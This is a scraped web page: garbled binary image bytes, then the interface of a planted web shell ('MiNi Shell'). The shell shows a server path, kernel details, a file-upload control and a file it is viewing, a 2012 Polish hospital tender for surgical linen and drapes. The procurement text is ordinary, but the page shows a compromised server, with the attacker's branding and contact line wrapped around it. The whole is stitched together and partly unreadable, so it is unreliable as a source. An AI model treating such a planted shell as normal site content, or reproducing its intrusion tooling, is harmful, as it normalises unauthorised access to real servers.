JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120529/118335-N-2012.html

<p class="kh_header"><b>Kraków: DOSTAWY BIELIZNY I POŚCIELI OPERACYJNEJ</b><br>
<b>Numer ogłoszenia: 118335 - 2012; data zamieszczenia: 29.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 12 63 08 099, faks 12 63 08 099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY BIELIZNY I POŚCIELI OPERACYJNEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet nr 1 - bielizna operacyjna
Lp.	Opis produktu	Kod CPV	J. m.	Ilość	Cena jednostkowa netto	Wartość netto	Stawka Vat	Wartość brutto	Nazwa handlowa/ Nr katalogowy
1.	Fartuch chirurgiczny barierowy wielokrotnego użytku, standardowego ryzyka, wykonany na bazie dwóch tkanin. W polu krytycznym tkanina poliestrowa z dodatkiem włókna węglowego o gramaturze 140 g/m2. W polu niekrytycznym tkanina bawełniano-poliestrowa gramatura max. 120 g/m2.
Zawartość bawełny min.55%. 
Fartuch wiązany z tyłu na troki - poły zakładane na siebie , szew łączący poszczególne tkaninowe elementy fartucha kryty , zawijany dwuigłowy- stębnowany, rękawy wykończone elastycznym ściągaczem, kolor niebieski. Temperatura prania 75 st. C.
Temperatura sterylizacji 134 st.C
Gwarancja barierowości przez 100 cykli PSS.
Trwałe oznaczenie nazwą szpitala i oddziału. Wzór nazwy : 5 WSzKzP/B  lub 5WSzKzP/O albo WSzKzP/L (w zależności od złożonego zamówienia na etapie wykonania umowy)	181000000	szt.	100					
2	Sukienka operacyjna niebieska -krótki rękaw wykonana z niepylącej, oddychającej tkaniny bawełniano-poliestrową o zawartości  bawełny powyżej o zawartości powyżej 50 % i gramaturze max.130 g/m2, wykrój pod szyją trzy kieszenie naszywane, kolor niebieski.
Trwałe oznaczenie nazwą szpitala i oddziału. Wzór nazwy : 5 WSzKzP/B  lub 5WSzKzP/O albo WSzKzP/L (w zależności od złożonego zamówienia na etapie wykonania umowy)	181000000	szt	30					
3.	Ubranie chirurgiczne wielokrotnego użytku wykonane z chłonącej płyny, niepalącej tkaniny bawełniano-poliestrowej. Tkanina ma zapewnić komfort dotykowy właściwy bawełnie. Gramatura max 120g/m2. Zawartość bawełny min.55%. ubranie ma być zgodne z normą PN-EN13795 w zakresie pylenia oraz czystości pod względem cząstek stałych. Kolor niebieski.
Trwałe oznaczenie nazwą szpitala i oddziału. Wzór nazwy : 5 WSzKzP/B  lub 5WSzKzP/O albo WSzKzP/L (w zależności od złożonego zamówienia na etapie wykonania umowy)	181000000	kpl	300	
Pakiet nr 2 - serwety operacyjne 
Lp.	Opis produktu	Kod CPV	J. m.	Ilość	Cena jednostkowa netto	Wartość netto	Stawka Vat	Wartość brutto	Nazwa handlowa/ Nr katalogowy
1.	Serweta operacyjna 180 x180 cm. wykonana z tkaniny poliestrowej o gramaturze 133-153g/m2 plus dodatkowa warstwa chłonna 80x80 cm. Wykonana z tkaniny poliestrowej o gramaturze min. 220 g/m2, chłonność min.120%, kolor niebieski.
Temperatura prania 75 st. C.
Temperatura sterylizacji 134 st.C
Gwarancja barierowości przez 100 cykli PSS.
Trwałe oznaczenie nazwą szpitala i oddziału. Wzór nazwy : 5 WSzKzP/B  lub 5WSzKzP/O albo WSzKzP/L (w zależności od złożonego zamówienia na etapie wykonania umowy)	181000000	szt.	150					
2.	Serwety boczne 75 x 120 cm. wykonane z tkaniny poliestrowej o gramaturze max.133-153g/m2 plus dodatkowa warstwa chłonna 80x40 cm wykonana z tkaniny poliestrowej chłonnej o gramaturze  min. 220 g/m2, chłonność min.120%, kolor niebieski.
Temperatura prania 75 st. C.
Temperatura sterylizacji 134 st.C
Gwarancja barierowości przez 100 cykli PSS.
Trwałe oznaczenie nazwą szpitala i oddziału. 
Wzór nazwy : 5 WSzKzP/B  lub 5WSzKzP/O albo WSzKzP/L (w zależności od złożonego zamówienia na etapie wykonania umowy)	17218200-5	szt.	500					
3.	Serweta na stolik do instrumentowania 150 x 200 cm, wykonana z tkaniny poliestrowej o gramaturze max.133-153g/m2 plus  warstwa chłonna na całej długości serwety 80x200 cm, wykonana z tkaniny poliestrowej chłonnej o gramaturze  min. 220 g/m2, chłonność min.120%, kolor niebieski.
Temperatura prania 75 st. C.
Temperatura sterylizacji 134 st.C
Gwarancja barierowości przez 100 cykli PSS.
Trwałe oznaczenie nazwą szpitala i oddziału. Wzór nazwy : 5 WSzKzP/B  lub 5WSzKzP/O albo WSzKzP/L (w zależności od złożonego zamówienia na etapie wykonania umowy)	181000000	szt.	100.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 17.21.82.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony i podpisany FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 2 do SIWZ.
2.	Wypełniony we wskazanych miejscach - FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA - według ZAŁĄCZNIKA NR 1 do SIWZ.
3.	Pełnomocnictwo umocowujące przynajmniej w zakresie podpisania oferty w postępowaniu o udzielenie zamówienia publicznego, dołączone do oferty, o ile nie wynika z innych dokumentów, załączonych przez Wykonawcę.
4.	Oświadczenie Wykonawcy, w trybie art. 44 ustawy, dotyczące spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy, ściśle według formularza stanowiącego ZAŁĄCZNIK NR 3 do SIWZ, a także ZAŁĄCZNIK NR 3A i co za tym idzie pisemne celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (o ile dotyczy).
5.	Oświadczenie Wykonawcy dotyczące niepodlegania wykluczeniu ściśle według formularza stanowiącego ZAŁĄCZNIKIEM NR 4 do SIWZ.
6.	Aktualny odpis z właściwego rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, jeżeli odrębne przepisy wymagają wpisu do rejestru.
7.	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt  6 składa odpowiedni dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 7 , zastępuje się je dokumentem zawierającym oświadczenie Wykonawcy złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - w zakresie dat wystawienia dokumentów, przepisy punktu 7 stosuje się odpowiednio.
9. Karta charakterystyki produktu
10. Karta danych technicznych tkaniny (certyfikat- świadectwo jakości ) wystawione przez producenta tkaniny użytej do oferowanej odzieży, pościeli operacyjnej, potwierdzająca parametry dotyczące składu, gramatury-masy, temperatury prania  itd.
11. Deklaracja zgodności wystawiona przez producenta potwierdzająca spełnienie przez odzież, pościeli operacyjnej, wymagań określonych w norma PN-EN 13795 : 2006 oraz certyfikat zgodności z numerem jednostki notyfikacyjnej biorącej udział w ocenie zgodności z obowiązującymi Polskimi Normami (w zakresie pakiet nr 1 poz. 3 ubranie ma być zgodne z normą PN-EN13795 w zakresie pylenia oraz czystości pod względem cząstek stałych).
12. Opis oferowanych rozmiarów damskich i męskich w formie tabeli rozmiarów oferowanych przez Wykonawcę gwarantujących dostawę prawidłowego rozmiaru.
13. Dokument potwierdzający gwarancję barierowości przez 100 cykli PSS wystawiony przez producenta materiałów użytych do produkcji gotowych wyrobów(w zakresie wymagań określonych w pozycji 1 w pakiecie nr 1, w zakresie pozycji 1,2,3 w pakiecie nr 2).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kupujący przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Sprzedający, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Kupującego, a także dotyczą: 
wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Sprzedającego,
zmian organizacyjnych Kupującego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,
zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Kupującego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
omyłek pisarskich lub błędów rachunkowych,
mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego
innych zmian korzystnych dla Kupującego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.
w zakresie przewidzianym w § 3 ust. 8, 10 wzoru umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką - Samodzielny Publiczny Zakład Opieki Zdrowotnej 30 - 901 Kraków, ul. Wrocławska 1-3..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2012 godzina 11:00, miejsce: Kancelaria Szpitala, (budynek komendy), ul. Wrocławska 1-3, 30 - 901 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - bielizna operacyjna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Fartuch chirurgiczny barierowy wielokrotnego użytku, standardowego ryzyka, wykonany na bazie dwóch tkanin. W polu krytycznym tkanina poliestrowa z dodatkiem włókna węglowego o gramaturze 140 g/m2. W polu niekrytycznym tkanina bawełniano-poliestrowa gramatura max. 120 g/m2.
Zawartość bawełny min.55%. 
Fartuch wiązany z tyłu na troki - poły zakładane na siebie , szew łączący poszczególne tkaninowe elementy fartucha kryty , zawijany dwuigłowy- stębnowany, rękawy wykończone elastycznym ściągaczem, kolor niebieski. Temperatura prania 75 st. C.
Temperatura sterylizacji 134 st.C
Gwarancja barierowości przez 100 cykli PSS.
Trwałe oznaczenie nazwą szpitala i oddziału. Wzór nazwy : 5 WSzKzP/B  lub 5WSzKzP/O albo WSzKzP/L (w zależności od złożonego zamówienia na etapie wykonania umowy)	181000000	szt.	100					
2	Sukienka operacyjna niebieska -krótki rękaw wykonana z niepylącej, oddychającej tkaniny bawełniano-poliestrową o zawartości  bawełny powyżej o zawartości powyżej 50 % i gramaturze max.130 g/m2, wykrój pod szyją trzy kieszenie naszywane, kolor niebieski.
Trwałe oznaczenie nazwą szpitala i oddziału. Wzór nazwy : 5 WSzKzP/B  lub 5WSzKzP/O albo WSzKzP/L (w zależności od złożonego zamówienia na etapie wykonania umowy)	181000000	szt	30					
3.	Ubranie chirurgiczne wielokrotnego użytku wykonane z chłonącej płyny, niepalącej tkaniny bawełniano-poliestrowej. Tkanina ma zapewnić komfort dotykowy właściwy bawełnie. Gramatura max 120g/m2. Zawartość bawełny min.55%. ubranie ma być zgodne z normą PN-EN13795 w zakresie pylenia oraz czystości pod względem cząstek stałych. Kolor niebieski.
Trwałe oznaczenie nazwą szpitala i oddziału. Wzór nazwy : 5 WSzKzP/B  lub 5WSzKzP/O albo WSzKzP/L (w zależności od złożonego zamówienia na etapie wykonania umowy)	181000000	kpl	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - serwety operacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serweta operacyjna 180 x180 cm. wykonana z tkaniny poliestrowej o gramaturze 133-153g/m2 plus dodatkowa warstwa chłonna 80x80 cm. Wykonana z tkaniny poliestrowej o gramaturze min. 220 g/m2, chłonność min.120%, kolor niebieski.
Temperatura prania 75 st. C.
Temperatura sterylizacji 134 st.C
Gwarancja barierowości przez 100 cykli PSS.
Trwałe oznaczenie nazwą szpitala i oddziału. Wzór nazwy : 5 WSzKzP/B  lub 5WSzKzP/O albo WSzKzP/L (w zależności od złożonego zamówienia na etapie wykonania umowy)	181000000	szt.	150	
Serwety boczne 75 x 120 cm. wykonane z tkaniny poliestrowej o gramaturze max.133-153g/m2 plus dodatkowa warstwa chłonna 80x40 cm wykonana z tkaniny poliestrowej chłonnej o gramaturze  min. 220 g/m2, chłonność min.120%, kolor niebieski.
Temperatura prania 75 st. C.
Temperatura sterylizacji 134 st.C
Gwarancja barierowości przez 100 cykli PSS.
Trwałe oznaczenie nazwą szpitala i oddziału. 
Wzór nazwy : 5 WSzKzP/B  lub 5WSzKzP/O albo WSzKzP/L (w zależności od złożonego zamówienia na etapie wykonania umowy)	17218200-5	szt.	500	
Serweta na stolik do instrumentowania 150 x 200 cm, wykonana z tkaniny poliestrowej o gramaturze max.133-153g/m2 plus  warstwa chłonna na całej długości serwety 80x200 cm, wykonana z tkaniny poliestrowej chłonnej o gramaturze  min. 220 g/m2, chłonność min.120%, kolor niebieski.
Temperatura prania 75 st. C.
Temperatura sterylizacji 134 st.C
Gwarancja barierowości przez 100 cykli PSS.
Trwałe oznaczenie nazwą szpitala i oddziału. Wzór nazwy : 5 WSzKzP/B  lub 5WSzKzP/O albo WSzKzP/L (w zależności od złożonego zamówienia na etapie wykonania umowy)	181000000	szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 17.21.82.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com